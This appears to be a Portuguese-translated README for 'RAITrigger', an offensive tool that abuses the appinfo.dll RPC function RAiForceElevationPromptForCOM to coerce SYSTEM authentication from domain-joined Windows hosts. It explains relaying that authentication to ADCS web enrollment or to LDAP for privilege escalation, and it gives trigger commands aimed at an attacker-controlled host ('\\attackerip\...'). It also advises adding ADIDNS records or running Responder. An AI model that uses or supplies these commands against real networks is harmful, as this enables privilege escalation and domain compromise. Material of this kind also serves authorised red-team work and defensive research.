
Local SYSTEM auth trigger for relaying
A função RPC RAiForceElevationPromptForCOM da biblioteca appinfo.dll permite coerção de SYSTEM. Isso funciona apenas em sistemas ingressados em domínio. Acontece que esta função pode ser chamada por qualquer usuário com privilégios baixos (não para gerar um processo) mas para acionar autenticação SYSTEM para um local arbitrário. Isso ocorre porque CreateFileW é chamado como SYSTEM para a localização do primeiro parâmetro de entrada:
Como o usuário com privilégios baixos ainda está sendo personificado, isso não pode ser usado como gatilho Potato para elevar Privilégios de SEImpersonate para SYSTEM:
Mas pode ser usado para solicitar um certificado de conta de computador contra ADCS quando a inscrição web está habilitada com a autenticação SMB recebida. Ou pode ser usado para LPE com relay para LDAP - quando a Assinatura LDAP não está habilitada.
Para acionar autenticação SMB:
[*] RAITrigger.exe \\attackerip\test\test.exe
Para acionar autenticação HTTP (o serviço WebClient precisa estar habilitado):
[*] RAITrigger.exe \\hostname@80\test\test.exe
A autenticação HTTP é acionada apenas para sistemas de zona de intranet confiável, então você precisará criar um registro ADIDNS para seu IP Kali ou estar na mesma sub-rede e usar e.G. Responder. Nunca use o FQDN completo, apenas o nome do host.
Chamar esta função remotamente (mesmo com administrador local) leva a rpc_access_denied, então isso não é uma alternativa para e.G. PetitPotam ou similar: